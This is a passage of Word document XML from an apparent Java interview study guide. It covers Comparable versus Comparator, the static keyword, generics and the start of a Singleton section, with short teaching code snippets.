                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> of objects</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="71B7B86B"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custom ordering</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> of objects</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00062B56" w:rsidRPr="00CE4B95" w14:paraId="176AFE84" w14:textId="77777777" w:rsidTr="00062B56">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7371BC9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 o1, T o2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00062B56" w:rsidRPr="00CE4B95" w14:paraId="34A9CCF6" w14:textId="77777777" w:rsidTr="00062B56">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7EB2C53F"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Separate class (or anonymous class / lambda)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00062B56" w:rsidRPr="00CE4B95" w14:paraId="79D67327" w14:textId="77777777" w:rsidTr="00062B56">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7128CD36" w14:textId="780049EB"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Affects</w:t>
            </w:r>
            <w:r w:rsidR="00591839" w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">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Yes, class must implement </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">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No, keeps original class unchanged</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00062B56" w:rsidRPr="00CE4B95" w14:paraId="63BC6203" w14:textId="77777777" w:rsidTr="00062B56">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="330C9661"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w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">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 comparator)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00062B56" w:rsidRPr="00CE4B95" w14:paraId="216342BC" w14:textId="77777777" w:rsidTr="00062B56">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4D09002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Can use lambda indirectly through </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">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Often used with lambda expressions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7803DC18" w14:textId="77777777" w:rsidR="00062B56" w:rsidRPr="00CE4B95"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7" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="471F7A18"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1D9BC635"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ble</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB984E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157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09D7E3A"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500448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5281A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T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44D8D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atural order by id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A4026B2"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6D926" w14:textId="7A45183E"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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="444884D4"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tor</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38FB468F"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Compar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CEBF28"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8827E5"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order by name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A6F1ECE"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427BC" w14:textId="03546123"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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA1FD25"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Java 8+ Lambda Comparator:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F66460"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Compa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A0F9039" w14:textId="55D329A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Comparator</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C5031E7" w14:textId="20F1E235" w:rsidR="00B7737D" w:rsidRPr="00CE4B95"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08D9CE3A" w14:textId="72A89C82" w:rsidR="00B45D48" w:rsidRPr="00CE4B95" w:rsidRDefault="00B45D48">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="_Toc197867237"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is static in java?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p w14:paraId="26C94D34" w14:textId="25F31B18" w:rsidR="00B45D48" w:rsidRPr="00CE4B95" w:rsidRDefault="000B3FA7">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Static</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t> is a modifier that can be applied to variables, methods, blocks, and nested classes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B4C2F5B" w14:textId="77777777" w:rsidR="0014432F" w:rsidRPr="00CE4B95" w:rsidRDefault="0014432F" w:rsidP="0014432F">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Variable (Class Variable):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C18CE7"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any object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6047416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Shared by all instances of the class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A4CAD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nitialized when class is loaded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C1BB949" w14:textId="77777777" w:rsidR="00C06BDA" w:rsidRPr="00CE4B95" w:rsidRDefault="00C06BDA" w:rsidP="00C06BDA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60750D1E"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5851F74"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coun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variable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F1459AA"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AC0B543"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F69166"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count</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>++;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3734C987"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44057C" w14:textId="75D0384A" w:rsidR="00392F44" w:rsidRPr="00CE4B95"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666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03EAB0D3" w14:textId="77777777" w:rsidR="00EF2376" w:rsidRPr="00CE4B95" w:rsidRDefault="00EF2376" w:rsidP="00EF2376">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Method:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D8E4AD1"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instances</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D92EA9"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be called without creating an object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44DFD11A"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access static members directly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006CB288"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88"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>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thUtil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09CE2A"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44371B64"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p>
    <w:p w14:paraId="1122B37B"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96FBC1" w14:textId="63B7EA70"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2F22348" w14:textId="2612DC44"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880000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>// Usage: MathUtils.add(5, 3);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2530F363" w14:textId="4256867A" w:rsidR="006A6A9D" w:rsidRPr="00CE4B95" w:rsidRDefault="006A6A9D" w:rsidP="006A6A9D">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Block:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F5E50B"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for static initialization of a class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3160CD29"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Executed when the class is loaded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6B5340"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6656823"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B58CECC"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atic block executed"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="590237E8"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BC4E52" w14:textId="4B3A147F"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9CB1A6F" w14:textId="77777777" w:rsidR="00D277B0" w:rsidRPr="00CE4B95" w:rsidRDefault="00D277B0" w:rsidP="00D277B0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Example Combining Both:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C83C1C9"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DF5CA"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EFAULT_URL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jdbc:defa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constant</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DBB21F1"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F121968"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3465723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2DA794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DefaultUr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026A4F9D"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EFAULT_URL</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437CF8D3"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8A4C39" w14:textId="16BB208E"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666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="666E0190" w14:textId="77777777" w:rsidR="00D277B0" w:rsidRPr="00CE4B95" w:rsidRDefault="00D277B0" w:rsidP="00B20DBE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A6DB86A" w14:textId="34B56921" w:rsidR="00A21AB9" w:rsidRPr="00CE4B95" w:rsidRDefault="00D704B2" w:rsidP="001E716D">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">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CE4B95" w:rsidRDefault="00610A67" w:rsidP="00610A67">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Note: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6528C3AB" w14:textId="77777777" w:rsidR="00893857" w:rsidRPr="00CE4B95" w:rsidRDefault="00610A67" w:rsidP="00610A67">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">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CE4B95" w:rsidRDefault="00893857" w:rsidP="00610A67">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13C32776" w14:textId="51F7236C" w:rsidR="00502865" w:rsidRPr="00CE4B95" w:rsidRDefault="00DA02D1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="_Toc197867238"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain Generics?</w:t>
      </w:r>
      <w:r w:rsidR="005166DA" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> What is the use of Generics?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p w14:paraId="76B79C58" w14:textId="4F2CB7EA" w:rsidR="005214B6" w:rsidRPr="00CE4B95" w:rsidRDefault="005214B6" w:rsidP="00D038A9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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Generics</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Java enable you to write </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>type-safe and reusable code</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. They allow you to define classes, interfaces, and methods with </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>type parameters</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, so you can work with any object type while maintaining compile-time type checking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF5DCC4"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09" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F2354B1"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CE4B95" w14:paraId="72BF1788" w14:textId="77777777" w:rsidTr="005214B6">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0975167F"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BECB3EA"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5214B6" w:rsidRPr="00CE4B95" w14:paraId="1A35C67C" w14:textId="77777777" w:rsidTr="005214B6">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="27F6C29B"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 xml:space="preserve">Catches type errors at compile time. No </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>ClassCastException</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> at runtime.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005214B6" w:rsidRPr="00CE4B95" w14:paraId="03E8E151" w14:textId="77777777" w:rsidTr="005214B6">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1C0C44C3"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Write a single class/method for any data type.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005214B6" w:rsidRPr="00CE4B95" w14:paraId="1DAE7F49" w14:textId="77777777" w:rsidTr="005214B6">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="181882BF"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Avoids unnecessary casting and makes the code easier to read.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005214B6" w:rsidRPr="00CE4B95" w14:paraId="2342AC4A" w14:textId="77777777" w:rsidTr="005214B6">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4A55D8AE"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lastRenderedPageBreak/>
              <w:t>Performance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5A6657C9"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Eliminates need for boxing/unboxing (with collections).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4FD8466F"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0" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3712E8F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out Generics (Old Java Style):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7D56FA"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7F7E833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34870B5F" w14:textId="15259F2B"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ual cast</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC05414"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 Generics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B9C8EC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701D75A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92E83C4" w14:textId="553367F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cast needed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D1A963"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1" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E5C1926"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Class Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3819170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55C0F"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T item</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF9703C"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537DE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i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19AB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31689D12"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5E7F6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4B41C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T </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284113"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0A55231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2E837" w14:textId="0950BD6E"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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F60E78" w14:textId="1E2C67A3" w:rsidR="005214B6" w:rsidRPr="00CE4B95" w:rsidRDefault="005214B6" w:rsidP="00D038A9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Usage:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE9F3C5"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ingBo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gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D39C4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D6DAAF" w14:textId="42887E6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201B07C0"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Method Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9927B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9676F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 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5EE4DB"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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437E7A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27952D" w14:textId="0709733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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125EF10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Bounded Generics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D48096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T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DD8D0"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936AF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p>
    <w:p w14:paraId="137B89E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9714BB" w14:textId="64E07354"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63F5D79"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Common Use in Collections:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA06578" w14:textId="15707F5D"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student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DE7A3AD"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2" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="32154647" w14:textId="0FB43BB4" w:rsidR="00502865" w:rsidRPr="00CE4B95" w:rsidRDefault="00E62D5A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="_Toc197867239"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is Singleton in java</w:t>
      </w:r>
      <w:r w:rsidR="00502865" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p w14:paraId="33D67A2B" w14:textId="174C3CA0" w:rsidR="00F21583" w:rsidRPr="00CE4B95" w:rsidRDefault="00F21583" w:rsidP="00E71B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design pattern</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that ensures </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>only one instance</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
